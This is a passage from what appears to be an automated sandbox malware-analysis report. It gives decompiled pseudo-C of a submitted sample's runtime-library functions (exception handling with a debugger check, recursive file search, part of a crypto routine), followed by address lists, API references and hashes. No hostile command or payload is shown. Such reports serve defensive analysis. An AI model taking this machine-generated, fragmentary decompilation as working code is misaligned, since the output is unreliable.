				if(_t719 < 0 || _t719 <= 0 &&  *((intOrPtr*)(_t523 + 0x6ca0)) <= _t647) {
					goto L6;
				} else {
					 *((char*)(_t710 + 0x5f)) = 1;
					E00BA3DC9(_t523);
					 *0xbd2260(_t710 + 0x14, 8);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t523 + 0xc))))() != 8) {
						goto L8;
					} else {
						_t709 = _t523 + 0x1024;
						E00BA6219(_t709, 0, 4,  *((intOrPtr*)(_t523 + 0x21bc)) + 0x5024, _t710 + 0x14, 0, 0, 0, 0);
						 *((intOrPtr*)(_t710 + 0x44)) = _t709;
						goto L7;
					}
				}
			}

0x00ba27d4
0x00ba27dd
0x00ba27e7
0x00ba27ee
0x00ba27f5
0x00ba27f8
0x00ba2801
0x00ba2804
0x00ba2807
0x00ba280e
0x00ba2880
0x00ba2880
0x00ba2883
0x00ba2883
0x00ba2887
0x00ba2890
0x00ba28ac
0x00ba28b2
0x00ba28c1
0x00ba28c9
0x00ba28cf
0x00ba28da
0x00ba28e5
0x00ba28e8
0x00ba28ee
0x00ba28f4
0x00ba28f6
0x00ba2904
0x00ba2904
0x00ba2907
0x00ba293c
0x00ba2909
0x00ba2909
0x00ba2909
0x00ba290c
0x00ba2930
0x00ba290e
0x00ba290e
0x00ba290e
0x00ba2911
0x00ba2924
0x00ba2913
0x00ba2913
0x00ba2916
0x00ba2918
0x00ba2918
0x00ba2916
0x00ba2911
0x00ba290c
0x00ba2946
0x00ba294c
0x00ba2952
0x00ba2955
0x00ba295b
0x00ba295e
0x00ba2969
0x00ba296c
0x00ba296d
0x00ba2970
0x00ba2990
0x00ba2996
0x00ba299c
0x00ba299f
0x00ba29a5
0x00ba29a8
0x00ba29ab
0x00ba30ce
0x00ba30d6
0x00ba30dd
0x00ba30e4
0x00ba30f1
0x00ba3103
0x00ba3108
0x00ba310e
0x00ba3120
0x00ba3126
0x00ba3133
0x00ba3140
0x00ba314d
0x00ba3153
0x00ba3155
0x00ba3162
0x00ba3164
0x00ba3164
0x00ba3165
0x00ba3165
0x00ba3171
0x00ba3181
0x00ba3181
0x00ba3184
0x00ba318a
0x00ba3190
0x00ba3192
0x00ba3193
0x00ba3198
0x00ba31a0
0x00ba31a6
0x00ba324a
0x00ba324d
0x00000000
0x00ba324d
0x00ba31ac
0x00ba31b2
0x00ba31b5
0x00000000
0x00000000
0x00ba31bb
0x00ba31be
0x00000000
0x00000000
0x00ba31c4
0x00ba31c7
0x00ba321c
0x00ba3223
0x00ba322a
0x00ba322f
0x00ba3233
0x00000000
0x00000000
0x00ba323c
0x00ba3241
0x00000000
0x00ba3241
0x00ba31c9
0x00ba31d0
0x00000000
0x00000000
0x00ba31d9
0x00ba31e7
0x00ba31e7
0x00ba31ea
0x00ba31f1
0x00ba31f9
0x00ba31fc
0x00ba3200
0x00ba3202
0x00ba3209
0x00ba320d
0x00ba3210
0x00ba3213
0x00ba3213
0x00ba3213
0x00ba3218
0x00ba321a
0x00000000
0x00000000
0x00000000
0x00ba321a
0x00ba3157
0x00ba3159
0x00ba3160
0x00000000
0x00000000
0x00000000
0x00ba3160
0x00ba29b1
0x00ba30a4
0x00ba30a4
0x00ba30ae
0x00ba30bc
0x00ba30c2
0x00ba30c2
0x00000000
0x00ba30ae
0x00ba29b7
0x00ba29ba
0x00ba2a4e
0x00ba2a56
0x00ba2a65
0x00ba2a69
0x00ba2a6c
0x00ba2a73
0x00ba2a7c
0x00ba2a7e
0x00ba2a82
0x00ba2a88
0x00ba2a8d
0x00ba2a99
0x00ba2aa6
0x00ba2ab3
0x00ba2ab9
0x00ba2abc
0x00ba2ac9
0x00ba2ac9
0x00ba2ac9
0x00ba2acb
0x00ba2acd
0x00ba2acd
0x00ba2ad3
0x00ba2ad6
0x00ba2ae2
0x00ba2ae2
0x00ba2ae4
0x00ba2ae4
0x00ba2aef
0x00ba2af1
0x00ba2af6
0x00ba2afc
0x00ba2b02
0x00ba2b0b
0x00ba2b1b
0x00ba2b1b
0x00ba2b04
0x00ba2b04
0x00ba2b06
0x00ba2b06
0x00ba2b1d
0x00ba2b33
0x00ba2b39
0x00ba2b47
0x00ba2b52
0x00ba2b5d
0x00ba2b60
0x00ba2b72
0x00ba2b80
0x00ba2b8b
0x00ba2b9b
0x00ba2ba9
0x00ba2bac
0x00ba2bb1
0x00ba2bb4
0x00ba2bb7
0x00ba2bba
0x00ba2bbd
0x00ba2bbf
0x00ba2bc1
0x00ba2bc3
0x00ba2bc3
0x00ba2bc1
0x00ba2bcc
0x00ba2bd2
0x00ba2bd8
0x00ba2c1d
0x00ba2c1d
0x00ba2c20
0x00ba2c2a
0x00ba2c2c
0x00ba2c3e
0x00ba2c3e
0x00ba2c48
0x00ba2c48
0x00ba2c4e
0x00ba2c50
0x00ba2c5a
0x00ba2c5f
0x00ba2c61
0x00ba2c63
0x00ba2c6d
0x00ba2c6d
0x00ba2c5f
0x00ba2c74
0x00ba2c77
0x00ba2c83
0x00ba2c83
0x00000000
0x00ba2c79
0x00ba2c79
0x00ba2c7c
0x00000000
0x00000000
0x00ba2c80
0x00ba2c85
0x00ba2c85
0x00ba2c91
0x00ba2c91
0x00ba2c93
0x00ba2c99
0x00ba2cc7
0x00ba2ccb
0x00ba2ccd
0x00ba2ccf
0x00ba2ccf
0x00ba2ccf
0x00ba2cd2
0x00ba2cd2
0x00ba2cdd
0x00ba2ce3
0x00ba2cea
0x00ba2cf0
0x00ba2cf2
0x00ba2cf8
0x00ba2cff
0x00ba2d05
0x00ba2d0c
0x00ba2d12
0x00ba2d12
0x00ba2d18
0x00ba2d1b
0x00ba2d20
0x00ba2d23
0x00ba2d25
0x00ba2d27
0x00ba2d29
0x00ba2d29
0x00ba2d37
0x00ba2d3c
0x00ba2d3e
0x00ba2d42
0x00ba2d49
0x00ba2dca
0x00ba2dd4
0x00ba2ddf
0x00ba2de2
0x00ba2de9
0x00ba2deb
0x00ba2deb
0x00ba2deb
0x00ba2dee
0x00ba2df0
0x00ba2efc
0x00ba2df6
0x00ba2dff
0x00ba2e02
0x00ba2e11
0x00ba2e1b
0x00ba2e1f
0x00ba2e26
0x00ba2e28
0x00ba2e2e
0x00ba2e35
0x00ba2e3e
0x00ba2e44
0x00ba2e45
0x00ba2e51
0x00ba2e55
0x00ba2e5b
0x00ba2e5d
0x00ba2e65
0x00ba2e6b
0x00ba2e6d
0x00ba2e77
0x00ba2e79
0x00ba2e84
0x00ba2e8c
0x00ba2e97
0x00ba2eb3
0x00ba2ec3
0x00ba2ec9
0x00ba2ecc
0x00ba2ed7
0x00ba2edf
0x00ba2ee4
0x00ba2ee7
0x00ba2eea
0x00ba2eed
0x00ba2eef
0x00ba2ef1
0x00ba2ef4
0x00ba2ef4
0x00ba2eef
0x00ba2e35
0x00ba2e28
0x00ba2f05
0x00ba2f0c
0x00ba2f0e
0x00ba2f10
0x00ba2f10
0x00ba2d4b
0x00ba2d4d
0x00ba2d50
0x00ba2d53
0x00ba2d5a
0x00ba2d5f
0x00ba2d6b
0x00ba2d70
0x00ba2d73
0x00ba2d75
0x00ba2d77
0x00ba2d8a
0x00ba2d94
0x00ba2d94
0x00ba2d99
0x00ba2d99
0x00ba2d99
0x00ba2d9b
0x00ba2d9e
0x00ba2da0
0x00ba2da2
0x00ba2da7
0x00ba2dae
0x00ba2daf
0x00ba2daf
0x00ba2db7
0x00ba2db7
0x00ba2f17
0x00ba2f1e
0x00ba2f2c
0x00ba2f2c
0x00ba2f3a
0x00ba2f3f
0x00ba2f46
0x00ba302a
0x00ba304b
0x00ba3054
0x00ba3060
0x00ba3066
0x00ba306e
0x00ba3070
0x00ba307d
0x00ba3084
0x00ba3089
0x00ba308d
0x00ba309a
0x00ba309a
0x00ba308d
0x00000000
0x00ba2f4c
0x00ba2f4f
0x00ba2f5d
0x00ba2f66
0x00ba2f6f
0x00ba2f72
0x00ba2f74
0x00ba2f76
0x00ba2f79
0x00ba2f7b
0x00ba2f7e
0x00ba2f81
0x00ba2f83
0x00ba2f8b
0x00ba2f8d
0x00ba2f90
0x00000000
0x00000000
0x00ba2f96
0x00ba2f9b
0x00000000
0x00000000
0x00ba2f9d
0x00ba2f9f
0x00ba2fae
0x00ba2fae
0x00ba2fbb
0x00ba2fc0
0x00ba2fc3
0x00ba2fc5
0x00ba2fc5
0x00ba2fc5
0x00ba2fc5
0x00ba2fc8
0x00ba2fca
0x00ba2fcd
0x00ba2fcd
0x00ba2fd0
0x00ba3001
0x00ba3001
0x00ba3001
0x00ba3008
0x00ba300f
0x00ba3014
0x00ba2fd2
0x00ba2fd4
0x00ba2fd7
0x00ba2fd7
0x00ba2fda
0x00ba2fdd
0x00ba2fdf
0x00ba2fec
0x00ba2fee
0x00ba2ff4
0x00ba2ff6
0x00ba2ff9
0x00ba2ff9
0x00ba2ff9
0x00ba2ffe
0x00000000
0x00ba2ffe
0x00ba3017
0x00ba3017
0x00ba3018
0x00ba301b
0x00ba301b
0x00ba3024
0x00ba3027
0x00000000
0x00ba3027
0x00ba2f46
0x00ba2ca6
0x00ba2ca8
0x00ba2cad
0x00ba2cb1
0x00ba2cb3
0x00ba2cc1
0x00ba2cc3
0x00000000
0x00ba2cc3
0x00ba2cb5
0x00ba2cb8
0x00000000
0x00000000
0x00ba2cbc
0x00000000
0x00ba2cbd
0x00ba2c77
0x00ba2c2e
0x00ba2c30
0x00000000
0x00000000
0x00ba2c32
0x00ba2c34
0x00ba2c36
0x00ba2c36
0x00000000
0x00ba2bda
0x00ba2bda
0x00ba2bda
0x00ba2bdd
0x00ba2c13
0x00000000
0x00ba2c13
0x00ba2be0
0x00ba2be0
0x00ba2be3
0x00ba2c07
0x00000000
0x00ba2c07
0x00ba2be5
0x00ba2be5
0x00ba2be8
0x00ba2bfb
0x00ba2bfb
0x00000000
0x00ba2bfb
0x00ba2bea
0x00ba2bed
0x00000000
0x00000000
0x00ba2bef
0x00000000
0x00ba2bef
0x00ba2bd8
0x00ba2ad8
0x00ba2adb
0x00000000
0x00000000
0x00ba2adf
0x00000000
0x00ba2adf
0x00ba2abe
0x00ba2ac1
0x00000000
0x00ba2ac3
0x00ba2ac3
0x00ba2ac5
0x00000000
0x00ba2ac5
0x00ba2ac1
0x00ba29c0
0x00ba29c3
0x00000000
0x00ba29c9
0x00ba29d5
0x00ba29dd
0x00ba29e5
0x00ba29f4
0x00ba29fc
0x00ba29ff
0x00ba2a05
0x00ba2a0b
0x00ba2a11
0x00ba2a13
0x00ba2a1d
0x00ba2a1d
0x00ba2a23
0x00ba2a2a
0x00ba2a38
0x00ba2a3b
0x00ba2a41
0x00ba2a41
0x00000000
0x00ba2a2a
0x00ba29c3
0x00ba2960
0x00ba2967
0x00000000
0x00000000
0x00000000
0x00ba2967
0x00ba2957
0x00ba2957
0x00000000
0x00ba28f8
0x00ba28fa
0x00ba3250
0x00ba3253
0x00ba3261
0x00ba326c
0x00ba326c
0x00ba28f6
0x00ba2892
0x00ba2894
0x00000000
0x00ba2894
0x00ba2818
0x00ba281a
0x00ba281c
0x00ba2822
0x00000000
0x00ba282e
0x00ba2830
0x00ba2834
0x00ba2846
0x00ba2853
0x00000000
0x00ba2855
0x00ba2865
0x00ba2876
0x00ba287b
0x00000000
0x00ba287b
0x00ba2853

APIs

__EH_prolog.LIBCMT ref: 00BA27DD
_strlen.LIBCMT ref: 00BA2D6B

Part of subcall function 00BB12D6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BAB592,00000000,?,?,?,00060384), ref: 00BB12F2

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BA2ECC

Strings

CMT, xrefs: 00BA2EFF

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: fad95857db0c8fc8d23d8dc5e40534bf76617494e57ad56aabbc93a699a70638
Instruction ID: d44b0e62ecbae76342388d0faed167688d3af33bd7bcdce7a5c51fc61e0f4db5
Opcode Fuzzy Hash: fad95857db0c8fc8d23d8dc5e40534bf76617494e57ad56aabbc93a699a70638
Instruction Fuzzy Hash: DF62E5719082448FDF19DF78C8956EA7BE1EF56300F0545BEFD9A8B282E770A944CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BC84EF Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E00BC84EF(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr _t67;
				int _t68;
				intOrPtr _t69;
				signed int _t70;

				_t69 = __esi;
				_t67 = __edi;
				_t66 = __edx;
				_t61 = __ebx;
				_t40 =  *0xbdd668; // 0xb57946a0
				_t41 = _t40 ^ _t70;
				_v8 = _t40 ^ _t70;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00BBEF01(_t41);
					_pop(_t62);
				}
				E00BBF1A0(_t67,  &_v804, 0, 0x50);
				E00BBF1A0(_t67,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t62;
				_v556 = _t66;
				_v560 = _t61;
				_v564 = _t69;
				_v568 = _t67;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x1b
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t68 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -785
				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					E00BBEF01(_t57);
				}
				return E00BBEA8A(_v8 ^ _t70);
			}

0x00bc84ef
0x00bc84ef
0x00bc84ef
0x00bc84ef
0x00bc84fa
0x00bc84ff
0x00bc8501
0x00bc8509
0x00bc850b
0x00bc850e
0x00bc8513
0x00bc8513
0x00bc851f
0x00bc8532
0x00bc8540
0x00bc8546
0x00bc854c
0x00bc8552
0x00bc8558
0x00bc855e
0x00bc8564
0x00bc856a
0x00bc8570
0x00bc8576
0x00bc857d
0x00bc8584
0x00bc858b
0x00bc8592
0x00bc8599
0x00bc85a0
0x00bc85a1
0x00bc85aa
0x00bc85b0
0x00bc85b0
0x00bc85b3
0x00bc85b9
0x00bc85c6
0x00bc85cf
0x00bc85d8
0x00bc85e1
0x00bc85ef
0x00bc85f1
0x00bc85f7
0x00bc8606
0x00bc8612
0x00bc8615
0x00bc861a
0x00bc8629

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BC85E7
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BC85F1
UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00BC85FE

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 1a0e5dfdd1492053dc36d56eeed9d7d66016649c4f72aedfc74391b346df8d0b
Instruction ID: a64f7dd76c85d05b50f3ba3b17d76dc534f62d2df2755d268f53a7263d7aca3a
Opcode Fuzzy Hash: 1a0e5dfdd1492053dc36d56eeed9d7d66016649c4f72aedfc74391b346df8d0b
Instruction Fuzzy Hash: 3B31B574901218ABCB21DF68DD89BDDB7F8BF18310F5041EAE41CA7261EB709B818F44

Uniqueness

Uniqueness Score: -1.00%

Function 00BCA928 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00BCA928(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				signed int _t62;
				signed int _t65;
				void* _t72;
				void* _t74;
				signed int _t75;
				void* _t78;
				CHAR* _t79;
				intOrPtr* _t83;
				intOrPtr _t85;
				void* _t87;
				intOrPtr* _t88;
				signed int _t92;
				signed int _t96;
				void* _t101;
				intOrPtr _t102;
				signed int _t105;
				union _FINDEX_INFO_LEVELS _t106;
				void* _t111;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t122;

				_push(__ecx);
				_t83 = _a4;
				_t2 = _t83 + 1; // 0x1
				_t101 = _t2;
				do {
					_t35 =  *_t83;
					_t83 = _t83 + 1;
				} while (_t35 != 0);
				_push(__edi);
				_t105 = _a12;
				_t85 = _t83 - _t101 + 1;
				_v8 = _t85;
				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
					_push(__ebx);
					_push(__esi);
					_t5 = _t105 + 1; // 0x1
					_t78 = _t5 + _t85;
					_t111 = E00BC8429(_t85, _t78, 1);
					_pop(_t87);
					__eflags = _t105;
					if(_t105 == 0) {
						L6:
						_push(_v8);
						_t78 = _t78 - _t105;
						_t40 = E00BCE6E1(_t87, _t111 + _t105, _t78, _a4);
						_t120 = _t119 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t72 = E00BCAB67(_a16, _t101, __eflags, _t111);
							E00BC835E(0);
							_t74 = _t72;
							goto L8;
						}
					} else {
						_push(_t105);
						_t75 = E00BCE6E1(_t87, _t111, _t78, _a8);
						_t120 = _t119 + 0x10;
						__eflags = _t75;
						if(_t75 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00BC86C9();
							asm("int3");
							_t118 = _t120;
							_t121 = _t120 - 0x150;
							_t43 =  *0xbdd668; // 0xb57946a0
							_v48 = _t43 ^ _t118;
							_t88 = _v32;
							_push(_t78);
							_t79 = _v36;
							_push(_t111);
							_t112 = _v332.cAlternateFileName;
							_push(_t105);
							_v372 = _t112;
							while(1) {
								__eflags = _t88 - _t79;
								if(_t88 == _t79) {
									break;
								}
								_t45 =  *_t88;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t88 = E00BCE730(_t79, _t88);
											continue;
										}
									}
								}
								break;
							}
							_t102 =  *_t88;
							__eflags = _t102 - 0x3a;
							if(_t102 != 0x3a) {
								L19:
								_t106 = 0;
								__eflags = _t102 - 0x2f;
								if(_t102 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t102 - 0x5c;
									if(_t102 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t102 - 0x3a;
										if(_t102 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t90 = _t88 - _t79 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
								E00BBF1A0(_t106,  &_v332, _t106, 0x140);
								_t122 = _t121 + 0xc;
								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
								_t55 = _v336;
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t92;
									_t93 = _t92 >> 2;
									_v344 = _t92 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00BCA928(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
											_t122 = _t122 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t93 = _v287;
											__eflags = _t93;
											if(_t93 == 0) {
												goto L37;
											} else {
												__eflags = _t93 - 0x2e;
												if(_t93 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t113,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t103 =  *_t55;
									_t96 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t96 - _t65;
									if(_t96 != _t65) {
										E00BC58F0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E00BCA780);
									}
								} else {
									_push(_t55);
									_t57 = E00BCA928(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
									L26:
									_t106 = _t57;
								}
								__eflags = _t113 - 0xffffffff;
								if(_t113 != 0xffffffff) {
									FindClose(_t113);
								}
							} else {
								__eflags = _t88 -  &(_t79[1]);
								if(_t88 ==  &(_t79[1])) {
									goto L19;
								} else {
									_push(_t112);
									E00BCA928(_t79, _t88, 0, _t112, _t79, 0, 0);
								}
							}
							__eflags = _v12 ^ _t118;
							return E00BBEA8A(_v12 ^ _t118);
						} else {
							goto L6;
						}
					}
				} else {
					_t74 = 0xc;
					L8:
					return _t74;
				}
				L40:
			}

0x00bca92d
0x00bca92e
0x00bca931
0x00bca931
0x00bca934
0x00bca934
0x00bca936
0x00bca937
0x00bca940
0x00bca941
0x00bca944
0x00bca947
0x00bca94c
0x00bca953
0x00bca954
0x00bca955
0x00bca958
0x00bca962
0x00bca965
0x00bca966
0x00bca968
0x00bca97c
0x00bca97c
0x00bca97f
0x00bca989
0x00bca98e
0x00bca991
0x00bca993
0x00000000
0x00bca995
0x00bca999
0x00bca9a2
0x00bca9a8
0x00000000
0x00bca9ab
0x00bca96a
0x00bca96a
0x00bca970
0x00bca975
0x00bca978
0x00bca97a
0x00bca9b1
0x00bca9b3
0x00bca9b4
0x00bca9b5
0x00bca9b6
0x00bca9b7
0x00bca9b8
0x00bca9bd
0x00bca9c1
0x00bca9c3
0x00bca9c9
0x00bca9d0
0x00bca9d3
0x00bca9d6
0x00bca9d7
0x00bca9da
0x00bca9db
0x00bca9de
0x00bca9df
0x00bcaa00
0x00bcaa00
0x00bcaa02
0x00000000
0x00000000
0x00bca9e7
0x00bca9e9
0x00bca9eb
0x00bca9ed
0x00bca9ef
0x00bca9f1
0x00bca9f3
0x00bca9fe
0x00000000
0x00bca9fe
0x00bca9f3
0x00bca9ef
0x00000000
0x00bca9eb
0x00bcaa04
0x00bcaa06
0x00bcaa09
0x00bcaa22
0x00bcaa22
0x00bcaa24
0x00bcaa27
0x00bcaa37
0x00bcaa39
0x00bcaa39
0x00bcaa29
0x00bcaa29
0x00bcaa2c
0x00000000
0x00bcaa2e
0x00bcaa2e
0x00bcaa31
0x00000000
0x00bcaa33
0x00bcaa33
0x00bcaa33
0x00bcaa31
0x00bcaa2c
0x00bcaa3f
0x00bcaa47
0x00bcaa4b
0x00bcaa59
0x00bcaa5e
0x00bcaa73
0x00bcaa75
0x00bcaa7b
0x00bcaa7e
0x00bcaab0
0x00bcaab0
0x00bcaab2
0x00bcaab5
0x00bcaabb
0x00bcaabb
0x00bcaac2
0x00bcaadc
0x00bcaadc
0x00bcaaeb
0x00bcaaf0
0x00bcaaf3
0x00bcaaf5
0x00000000
0x00000000
0x00000000
0x00000000
0x00bcaac4
0x00bcaac4
0x00bcaaca
0x00bcaacc
0x00000000
0x00bcaace
0x00bcaace
0x00bcaad1
0x00000000
0x00bcaad3
0x00bcaad3
0x00bcaada
0x00000000
0x00000000
0x00000000
0x00000000
0x00bcaada
0x00bcaad1
0x00bcaacc
0x00000000
0x00bcaaf7
0x00bcaaff
0x00bcab05
0x00bcab07
0x00bcab07
0x00bcab0f
0x00bcab14
0x00bcab1c
0x00bcab1f
0x00bcab21
0x00bcab35
0x00bcab3a
0x00bcaa80
0x00bcaa80
0x00bcaa84
0x00bcaa8c
0x00bcaa8c
0x00bcaa8c
0x00bcaa8e
0x00bcaa91
0x00bcaa94
0x00bcaa94
0x00bcaa0b
0x00bcaa0e
0x00bcaa10
0x00000000
0x00bcaa12
0x00bcaa12
0x00bcaa18
0x00bcaa1d
0x00bcaa10
0x00bcaaa1
0x00bcaaac
0x00000000
0x00000000
0x00000000
0x00bca97a
0x00bca94e
0x00bca950
0x00bca9ac
0x00bca9b0
0x00bca9b0
0x00000000

Strings

., xrefs: 00BCAABB

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 4ea27703585f8da86c52554b4cd61a084945c48fe40a8654b5f998cf82c1924b
Instruction ID: 4e76c7b3b715a92371192cc4619ff93354d1d877238f43a2f29c9095f9a5eabd
Opcode Fuzzy Hash: 4ea27703585f8da86c52554b4cd61a084945c48fe40a8654b5f998cf82c1924b
Instruction Fuzzy Hash: 7731CF7290024DABCB249E78CC85EFA7BFDDB85318F1402ECF55997251EA709D44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BCCA20 Relevance: 3.5, APIs: 2, Instructions: 464
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 90%

			E00BCCA20(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
